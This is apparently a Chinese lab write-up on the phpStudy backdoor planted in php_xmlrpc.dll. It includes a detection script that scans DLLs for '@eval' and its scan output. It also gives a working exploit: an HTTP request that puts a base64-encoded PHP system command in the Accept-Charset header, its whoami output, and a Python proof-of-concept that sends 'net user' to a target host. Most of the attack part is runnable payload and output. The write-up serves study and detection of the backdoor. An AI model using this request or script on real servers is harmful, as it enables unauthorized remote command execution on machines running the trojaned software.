phpstudy2016 +win10
启动有漏洞的phpstudy
pcat的检测脚本如下
python版本:
# -*- coding:utf8 -*-
__author__='[email protected]'
__blog__='http://pcat.cc'import os
import string
import re
def strings(file) :
chars = string.printable[:94]
shortestReturnChar = 4
regExp = '[%s]{%d,}' % (chars, shortestReturnChar)
pattern = re.compile(regExp)
with open(file, 'rb') as f:
return pattern.findall(f.read())
def grep(lines,pattern):
for line in lines:
if pattern in line:
yield line
def pcheck(filename):
# trojan feature
trojan='@eval'
# just check dll file
if filename.endswith('.dll'):
lines=strings(filename)
try:
grep(lines,trojan).next()
except:
return
print '=== {0} ==='.format(filename)
for line in grep(lines,trojan):
print line
pass
def foo():
# . stand for current directory
for path, dirs, files in os.walk(".", topdown=False):
for name in files:
pcheck(os.path.join(path, name))
for name in dirs:
pcheck(os.path.join(path, name))
pass
if __name__ == '__main__':
foo()
放在phpstudy目录下
有如下运行结果
=== .\PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll ===
@eval(%s('%s'));
%s;@eval(%s('%s'));
=== .\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll ===
@eval(%s('%s'));
%s;@eval(%s('%s'));
[Finished in 10.2s]
可以发现 主要是这两个版本的phpstudy出现了问题。
切换到这两个版本的任意一个
然后随便访问一个php文件
burp发包:
GET /1.php HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding:gzip,deflate
Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
Connection: close
得到如下回显:
HTTP/1.1 200 OK
Date: Mon, 07 Oct 2019 13:36:04 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Content-Length: 48
Connection: close
Content-Type: text/htmldesktop-8ai2nf3\11466
desktop-8ai2nf3\11466test
需要注意的的两点:
Accept-Encoding:gzip,deflate
这个必须要有
Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw==
这个是要执行的命令base64 编码
网上随便找了个检测的脚本:
# -*-coding:utf-8 -*-import requests
import sys
import base64
def Poc(ip):
payload = "net user;"
poc = "ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw=="
pay = base64.b64encode(payload.encode('utf-8'))
#poc = str(pay,"utf-8")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
"Connection": "close",
"Accept-Encoding": "gzip,deflate",
"Accept-Charset": pay,
"Upgrade-Insecure-Requests": "1",
}
url = ip
r = requests.get(url,headers=headers)
print(r.content)
# if "Administrator" or "DefaultAccount" in r.text:
# # print(r.text)
# else:
# print("不存在phpstudy后门")
# if len(sys.argv) < 2:
# print("python phpstudy.py http://127.0.0.1")
# else:
# Poc(sys.argv[1])
Poc("http://192.168.44.1/1.php")